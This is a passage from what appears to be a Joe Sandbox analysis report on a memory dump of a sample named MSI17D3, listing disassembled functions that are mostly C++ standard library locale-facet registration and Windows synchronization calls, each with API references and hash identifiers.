codecvt.LIBCPMT ref: 00CC23DA
std::_Facet_Register.LIBCPMT ref: 00CC23F1
std::_Lockit::~_Lockit.LIBCPMT ref: 00CC2411

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID:
API String ID: 712880209-0
Opcode ID: 388a0f40b720bc734e7d74d42caa06968aa7cf9ad725153314d76e6506f7affa
Instruction ID: fa2e234de65d13956cb376ec3f9cc2783a07b4333e97ec4bf37a8833ce592e82
Opcode Fuzzy Hash: 388a0f40b720bc734e7d74d42caa06968aa7cf9ad725153314d76e6506f7affa
Instruction Fuzzy Hash: BF01C035900219DFCB09EBA4D841FBE77A5AF80710F24040EE511AB392CF749E45DBA2

Function 00CC24B9 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CC24C0
std::_Lockit::_Lockit.LIBCPMT ref: 00CC24CA

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

collate.LIBCPMT ref: 00CC2504
std::_Facet_Register.LIBCPMT ref: 00CC251B
std::_Lockit::~_Lockit.LIBCPMT ref: 00CC253B

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
String ID:
API String ID: 1007100420-0
Opcode ID: 917e4ae493abe500b7559644888a51d1c3bc31cf5f343f222178d6919e763a6f
Instruction ID: 56de8c058a358d6d373f49dae2998d08cc0ed6c72d49e27f688919b9a6cfd2f6
Opcode Fuzzy Hash: 917e4ae493abe500b7559644888a51d1c3bc31cf5f343f222178d6919e763a6f
Instruction Fuzzy Hash: C601C031900219DBCB09EBA4E845BBE7765AF84720F24040EF510AB391CF30DE01EBA2

Function 00CC2424 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CC242B
std::_Lockit::_Lockit.LIBCPMT ref: 00CC2435

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

collate.LIBCPMT ref: 00CC246F
std::_Facet_Register.LIBCPMT ref: 00CC2486
std::_Lockit::~_Lockit.LIBCPMT ref: 00CC24A6

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
String ID:
API String ID: 1007100420-0
Opcode ID: 06731cae5cd3ae8d6693a1a98814414989231650e83ced5f260de9262c0773d4
Instruction ID: e28833f2cbbb87e96e24fd6fd18a8f49ed53a9892af63b807b200b3c02200c96
Opcode Fuzzy Hash: 06731cae5cd3ae8d6693a1a98814414989231650e83ced5f260de9262c0773d4
Instruction Fuzzy Hash: AF01C431900215DFCB09EBA0E841BBE7B65AF84710F24040EF510673D2DF709E44DBA1

Function 00CC25E3 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CC25EA
std::_Lockit::_Lockit.LIBCPMT ref: 00CC25F4

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

messages.LIBCPMT ref: 00CC262E
std::_Facet_Register.LIBCPMT ref: 00CC2645
std::_Lockit::~_Lockit.LIBCPMT ref: 00CC2665

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
String ID:
API String ID: 2750803064-0
Opcode ID: 218d203a210672b0f617c8a2a64fe1ba817ee5ea41393434f12585eb45660266
Instruction ID: 3af5aba8e18b6169326d00dab165c95beff0be84a1085418364e2946552add4e
Opcode Fuzzy Hash: 218d203a210672b0f617c8a2a64fe1ba817ee5ea41393434f12585eb45660266
Instruction Fuzzy Hash: 4101C035900219DBCB05EBA0E815FBE7BA5AF84710F24440EF510AB392CF709E00DBA2

Function 00CC254E Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CC2555
std::_Lockit::_Lockit.LIBCPMT ref: 00CC255F

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

ctype.LIBCPMT ref: 00CC2599
std::_Facet_Register.LIBCPMT ref: 00CC25B0
std::_Lockit::~_Lockit.LIBCPMT ref: 00CC25D0

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registerctype
String ID:
API String ID: 83828444-0
Opcode ID: abfdcb912c489ffd147cd412facf139e9729145ae88a20b35a31a47d633fc348
Instruction ID: 7ba75cb9a13f561a45740046ce4104d03b395e96e0f75fb69d825ea7837e5d55
Opcode Fuzzy Hash: abfdcb912c489ffd147cd412facf139e9729145ae88a20b35a31a47d633fc348
Instruction Fuzzy Hash: 0301C075900259DBCB05EBA0D851FBE7765AF84320F24040EE511AB392DF309E45DBA2

Function 00CC2678 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CC267F
std::_Lockit::_Lockit.LIBCPMT ref: 00CC2689

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

messages.LIBCPMT ref: 00CC26C3
std::_Facet_Register.LIBCPMT ref: 00CC26DA
std::_Lockit::~_Lockit.LIBCPMT ref: 00CC26FA

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
String ID:
API String ID: 2750803064-0
Opcode ID: e7451501a5164392cfa1c2ac51107c1468d0932a22effa1f12f7fa28a801cb7a
Instruction ID: 2d961c90f792118e649e3d94cbf919f56690e63bd4abb33b41ee950bbde07067
Opcode Fuzzy Hash: e7451501a5164392cfa1c2ac51107c1468d0932a22effa1f12f7fa28a801cb7a
Instruction Fuzzy Hash: E701C071900219DFCB15EBA4D841BBEB765AF84310F24440EF610AB392CF709E01EBA2

Function 00CCE8D8 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CCE8DF
std::_Lockit::_Lockit.LIBCPMT ref: 00CCE8E9

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

messages.LIBCPMT ref: 00CCE923
std::_Facet_Register.LIBCPMT ref: 00CCE93A
std::_Lockit::~_Lockit.LIBCPMT ref: 00CCE95A

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
String ID:
API String ID: 2750803064-0
Opcode ID: a76914d9aae49e5b6dbd2806f03fcda595598a2b1972b18ad86d936943efa8d0
Instruction ID: 238d84d2f335e3452782c63ef52938457477b318bfe7039a1726f33131aca48d
Opcode Fuzzy Hash: a76914d9aae49e5b6dbd2806f03fcda595598a2b1972b18ad86d936943efa8d0
Instruction Fuzzy Hash: 52018C71900259DFCB05EBA4D841BFE7BA5BF85720F25050EE614AB392CF749E01DBA2

Function 00CCE843 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CCE84A
std::_Lockit::_Lockit.LIBCPMT ref: 00CCE854

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

collate.LIBCPMT ref: 00CCE88E
std::_Facet_Register.LIBCPMT ref: 00CCE8A5
std::_Lockit::~_Lockit.LIBCPMT ref: 00CCE8C5

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
String ID:
API String ID: 1007100420-0
Opcode ID: 13df91c164a89fdb1ed9220e190d4b5cfb969e0802cede977eb139a5b23a39f4
Instruction ID: 07cbcf326532addaaabdff2d3c16ace61ae97930e93b823a7f8344eeb22f42de
Opcode Fuzzy Hash: 13df91c164a89fdb1ed9220e190d4b5cfb969e0802cede977eb139a5b23a39f4
Instruction Fuzzy Hash: B401AD76900219DBCB05EBA8D801BAE77A5AF85710F24440EE511AB3D2CF309E01DBA2

Function 00CC29F6 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CC29FD
std::_Lockit::_Lockit.LIBCPMT ref: 00CC2A07

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

moneypunct.LIBCPMT ref: 00CC2A41
std::_Facet_Register.LIBCPMT ref: 00CC2A58
std::_Lockit::~_Lockit.LIBCPMT ref: 00CC2A78

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID:
API String ID: 419941038-0
Opcode ID: 2ed957537f2a2648807ce9d804cc316be4231014cb41274ae9e60766923ebd7a
Instruction ID: e3483cc3683cf2fee6504440497a4d7b928b541a020192675a105d9efdbb5cb4
Opcode Fuzzy Hash: 2ed957537f2a2648807ce9d804cc316be4231014cb41274ae9e60766923ebd7a
Instruction Fuzzy Hash: 8501D271900219DFCB15EBA4D845BBE77A5AF84710F24050EF510AB392CF309E01EBA2

Function 00CC2961 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CC2968
std::_Lockit::_Lockit.LIBCPMT ref: 00CC2972

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

moneypunct.LIBCPMT ref: 00CC29AC
std::_Facet_Register.LIBCPMT ref: 00CC29C3
std::_Lockit::~_Lockit.LIBCPMT ref: 00CC29E3

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID:
API String ID: 419941038-0
Opcode ID: 3b223355de0bba1e468963b2214ac813a1dd903f2920aebf4d1d5a86cee18007
Instruction ID: a6c7761e10eb6d7abbf62c594bb21d449149c287d98e70ac1c7f9b45ee2e3e2c
Opcode Fuzzy Hash: 3b223355de0bba1e468963b2214ac813a1dd903f2920aebf4d1d5a86cee18007
Instruction Fuzzy Hash: FC018071900219DBCB15EBA4D842BBE7765AF84710F24450EE515AB392DF709E01DBA2

Function 00CC2A8B Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CC2A92
std::_Lockit::_Lockit.LIBCPMT ref: 00CC2A9C

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

moneypunct.LIBCPMT ref: 00CC2AD6
std::_Facet_Register.LIBCPMT ref: 00CC2AED
std::_Lockit::~_Lockit.LIBCPMT ref: 00CC2B0D

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID:
API String ID: 419941038-0
Opcode ID: 6b0b11d7e9c7f50697c2f7ef2bd038743554d2b1a22fcb883b091d86e65c37b0
Instruction ID: 16a07b7797598705affcd310f7501647565e5daf932da680136576a073ec6758
Opcode Fuzzy Hash: 6b0b11d7e9c7f50697c2f7ef2bd038743554d2b1a22fcb883b091d86e65c37b0
Instruction Fuzzy Hash: 3101C071900219DFCB15EFA4D851FBEB765AF84720F24480EE615AB392CF709E01DBA2

Function 00CCEA97 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CCEA9E
std::_Lockit::_Lockit.LIBCPMT ref: 00CCEAA8

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

moneypunct.LIBCPMT ref: 00CCEAE2
std::_Facet_Register.LIBCPMT ref: 00CCEAF9
std::_Lockit::~_Lockit.LIBCPMT ref: 00CCEB19

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID:
API String ID: 419941038-0
Opcode ID: 47884191770becd58bd991eb2f9ff2a41adca59337d35f062cf69d033285ba33
Instruction ID: a5cd91151491cd5d49dfb88af905adc00fcf47b157d96ebaa4fd4b322f75b255
Opcode Fuzzy Hash: 47884191770becd58bd991eb2f9ff2a41adca59337d35f062cf69d033285ba33
Instruction Fuzzy Hash: FE01C032D00219DFCB15EBA4D851BBE7765BF80320F24050EE515AB392CF309E01DBA2

Function 00CCEB2C Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CCEB33
std::_Lockit::_Lockit.LIBCPMT ref: 00CCEB3D

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

moneypunct.LIBCPMT ref: 00CCEB77
std::_Facet_Register.LIBCPMT ref: 00CCEB8E
std::_Lockit::~_Lockit.LIBCPMT ref: 00CCEBAE

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID:
API String ID: 419941038-0
Opcode ID: 62def3ad9754684978a4e8bbe35503144974e340ed92303f13239ae27d980fab
Instruction ID: ca5f7fc73c604fd867c5c2acd333adb1d9ab4cb8d3b9b41bd755959e3ee90e22
Opcode Fuzzy Hash: 62def3ad9754684978a4e8bbe35503144974e340ed92303f13239ae27d980fab
Instruction Fuzzy Hash: A501C031900219DFCB05EBA4D891FBEB765AF84710F24040EE515AB3D2CF709E01DBA2

Function 00CC2B20 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CC2B27
std::_Lockit::_Lockit.LIBCPMT ref: 00CC2B31

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

moneypunct.LIBCPMT ref: 00CC2B6B
std::_Facet_Register.LIBCPMT ref: 00CC2B82
std::_Lockit::~_Lockit.LIBCPMT ref: 00CC2BA2

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID:
API String ID: 419941038-0
Opcode ID: e74b6dfed0240e1de0180177ea8f32d699bcb3b59297d4e8fe31037665ea8166
Instruction ID: cce5eadf5b9d1670591a2965ed8efcd570c99658499806d0830664d78b0d3e9a
Opcode Fuzzy Hash: e74b6dfed0240e1de0180177ea8f32d699bcb3b59297d4e8fe31037665ea8166
Instruction Fuzzy Hash: F101C031900219DBCB15EFA4D851FBE7775AF84720F24040EE615AB392CF709E00EBA2

Function 00CC2D74 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CC2D7B
std::_Lockit::_Lockit.LIBCPMT ref: 00CC2D85

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

numpunct.LIBCPMT ref: 00CC2DBF
std::_Facet_Register.LIBCPMT ref: 00CC2DD6
std::_Lockit::~_Lockit.LIBCPMT ref: 00CC2DF6

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
String ID:
API String ID: 743221004-0
Opcode ID: 237f6058d8f33b34241721b1c307b789888c73e5e05fafd9773c10088a635839
Instruction ID: ec5d850a9fc7fa1eda9610999367fdaa13e9353786357ca551412f8c34a81716
Opcode Fuzzy Hash: 237f6058d8f33b34241721b1c307b789888c73e5e05fafd9773c10088a635839
Instruction Fuzzy Hash: 4401DE35900219DFCB15EBA0D841BBEB7A5BF94310F24080EF515AB392CF709E01EBA2

Function 00CD2C4E Relevance: 7.5, APIs: 5, Instructions: 37COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00D0DD3C,?,?,00CB2427,00D0E638,00CF6B40), ref: 00CD2C58
LeaveCriticalSection.KERNEL32(00D0DD3C,?,?,00CB2427,00D0E638,00CF6B40), ref: 00CD2C8B
RtlWakeAllConditionVariable.NTDLL ref: 00CD2D02
SetEvent.KERNEL32(?,00CB2427,00D0E638,00CF6B40), ref: 00CD2D0C
ResetEvent.KERNEL32(?,00CB2427,00D0E638,00CF6B40), ref: 00CD2D18

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
String ID:
API String ID: 3916383385-0
Opcode ID: ee19b692740c4a30d5a9447956ca1a5d4a475aca654b9e66b49a357d419932ee
Instruction ID: 4d6487998f5115a9876712e748429f81f2a8fd795ee25bcf906b4a1a948ea7ca
Opcode Fuzzy Hash: ee19b692740c4a30d5a9447956ca1a5d4a475aca654b9e66b49a357d419932ee
Instruction Fuzzy Hash: F3014232A14320DFCB15AF58FC08BA87BA6FF49341700056AF90AC3320CB305941EBB1

Function 00CBBB40 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 181memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000018,665E9022,?,00000000), ref: 00CBBBA3
Concurrency::cancel_current_task.LIBCPMT ref: 00CBBD7F

Strings

true, xrefs: 00CBBCAB
false, xrefs: 00CBBC95

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: AllocConcurrency::cancel_current_taskLocal
String ID: false$true
API String ID: 3924972193-2658103896
Opcode ID: 61e67b9219d6bcf9dd493e6d4df56efdafb9e4a98ca79ae8c9c6731809ff9c2a
